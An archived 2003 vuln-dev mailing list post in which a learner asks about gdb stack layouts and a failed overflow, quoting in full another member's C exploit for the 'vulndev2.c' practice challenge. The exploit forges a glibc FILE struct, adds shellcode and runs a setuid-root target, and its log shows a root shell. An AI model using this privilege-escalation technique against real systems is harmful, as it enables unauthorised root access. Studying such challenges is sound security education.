Vulnerability Development mailing list archives

N00b questions :\

From: Diode Trnasistor <ffddfe () yahoo com>
Date: Sat, 24 May 2003 16:52:52 -0700 (PDT)

Playing with these challenges (and thanx so much for
posting these) i came across some things which aren't
so clear and i'm hoping someone can explain them to

I wrote a simple program i was hoping will demonstrate
the standard stack based overflow for me.  It looks
like this:

void main() {
    char buffer[12];
    char longbuffer[30];
    int i;

    memset(longbuffer, 'A', 30);
    longbuffer[29] = 0;

    strcpy(buffer, longbuffer);

After compilation, inside gdb, disassemble main i get
0x8048440 <main>:       push   %ebp
0x8048441 <main+1>:     mov    %esp,%ebp
0x8048443 <main+3>:     sub    $0x38,%esp
0x8048446 <main+6>:     add    $0xfffffffc,%esp
...etc etc.

Now up untill main+3 it makes sense.  Why is this
enormous number being added to stack pointer is beyond
me.  Shouldn't this completelly ruin the stack? 
Doesn't the stack start at the highest adress and grow
down?  WTF?

Moving on i write another sample program:
void function(int i, int b, int c) {
    char buffer[12];
    char buffer2[5];


int main(void) {
    function(1, 2, 3);
    return 0;

disassemble function with gdb yields:
0x80483d0 <function>:   push   %ebp
0x80483d1 <function+1>: mov    %esp,%ebp
0x80483d3 <function+3>: sub    $0x28,%esp
...etc etc
WTF?!  ok so it sets up a new stack frame and then
makes room for the local auto variables.  Now i'm not
very good at math but last i checked 12 + 8 made 20. 
Not 40.  Again, WTF?  Is gentoo using unicode or
something crazy like that?  God i cry...

Moving on, i try to abuse the obvious strcpy in
vulndev2.c, so i run it with obvious 
(gdb) run `perl -e 'print "A"x200'` two

And what happens?  Segmentation fault 0x41414141 in
strcpy?  Hell no!  I get a completelly baffling:
Segmentation fault.
0x40085013 in _IO_getline_info () from /lib/

0x40085013?  _IO_getline_info?  Where did that come
from? Looking at begining of vulndev2.c..

main(int argc, char *argv[])
        char    *bfp;
        char    buf[BFSIZE];
        FILE    *f1;

I'd assume that buf was on the stack.  Why doesn't
writing WAY past the end of this buffer cause a jump
to 41414141?  I am SO confused HALP!

PS: i'm a n00b :\

--- "D." <dugely () yahoo com> wrote:
Hello vuln-dev!

Attached is an exploit for vulndev2.c, or you can
download it here:

This was a fun challenge and I hope there are lots
interesting posts about it as well as many more
interesting challenges in the future!

Doug Hoyte
Hypervivid Solutions, Inc

Do you Yahoo!?
The New Yahoo! Search - Faster. Easier. Bingo.> /*

  vulndev2.c exploit - (C) 2003 Doug Hoyte and
Hypervivid Solutions, Inc

doug@saturn:~/devel/vulndev$ uname -mnrsp
Linux saturn 2.4.19 i686 unknown
doug@saturn:~/devel/vulndev$ gcc -Wall -g -o
vulndev2sploit vulndev2sploit.c
doug@saturn:~/devel/vulndev$ gcc -Wall -g -o
vulndev2 vulndev2.c
doug@saturn:~/devel/vulndev$ su
root@saturn:/home/doug/devel/vulndev# chown root
root@saturn:/home/doug/devel/vulndev# chgrp root
root@saturn:/home/doug/devel/vulndev# chmod a+rxs
root@saturn:/home/doug/devel/vulndev# exit
doug@saturn:~/devel/vulndev$ ls -al vulndev2
-rwsr-sr-x    1 root     root        18373 May 24
04:16 vulndev2
doug@saturn:~/devel/vulndev$ ./vulndev2sploit
./vulndev2 bffff86c

[*] vulndev2.c sploit by Doug Hoyte:

[*] Using offset bffff86c

[*] Removing old log file 'db.log'

[*] Sploiting...

sh-2.05a# whoami
sh-2.05a# exit


#include <unistd.h>
#include <ctype.h>
#include <stdio.h>

/* my strtok's, well... don't ask */
int my_hatoi(char *tp) {
  int t=0;
  char tc;

  if (tp[0]=='0' && tp[1]=='x') tp+=2;
  while(isxdigit(tc = tolower(*tp))) {
    if (isdigit(tc)) t = (t<<4) + (tc - '0');
    else t = (t<<4) + (tc - 'a' + 10);

  return t;

int main (int argc, char *argv[]) {

  // shellcode for Linux/x86 by Aleph Null
  char shellcode[] =



  char sploit1[2000];
  char sploit2[100];
  int i, ADDR_OF_BUF, *tp;

  printf("\n[*] vulndev2.c sploit by Doug Hoyte:\n\n");

  if (argc != 3) {
    printf("       Usage: %s <path to vulndev2>
<offset>\n", argv[0]);
    printf("       Offset should be the location in
memory of the 'buf' variable\n\n");
    return 0;

  ADDR_OF_BUF = my_hatoi(argv[2]);
  printf("[*] Using offset %x\n\n", ADDR_OF_BUF);

  /* Remove the old log file */
  printf("[*] Removing old log file 'db.log'\n\n");

  // Everything to 'a's
  memset(sploit1, 'a', sizeof(sploit1));

  // Set BFP to point 2 bytes before F1 (so those
damn semi-colons don't get in the way)
  *((int*)(sploit1+92)) = ADDR_OF_BUF-4-2;

  // The magic number for FILE structs on glibc is
0xfBAD! Dig?
  tp = (int*) (sploit1+96);
  tp[0] = 0xFBAD0101;

  // The FILE struct BS, we don't really care: we
just want the ...
  for(i=1;i<40;i++) tp[i] = (int)

  // ... jump table
  for(i=40;i<48;i++) tp[i] = (int)

  // Tag the shell code on at the end
  memcpy(sploit1+96+(40*4)+(8*4), shellcode,

  // Use arg #2 to point F1 to our FILE struct
  memset(sploit2, '\0', sizeof(sploit2));
  *((int*)sploit2) = ADDR_OF_BUF+96;

  // There's a bad moon on the rise...
  printf("[*] Sploiting...\n\n");
  execl(argv[1], argv[1], sploit1, sploit2, NULL);

  return 0;


Do you Yahoo!?
The New Yahoo! Search - Faster. Easier. Bingo.

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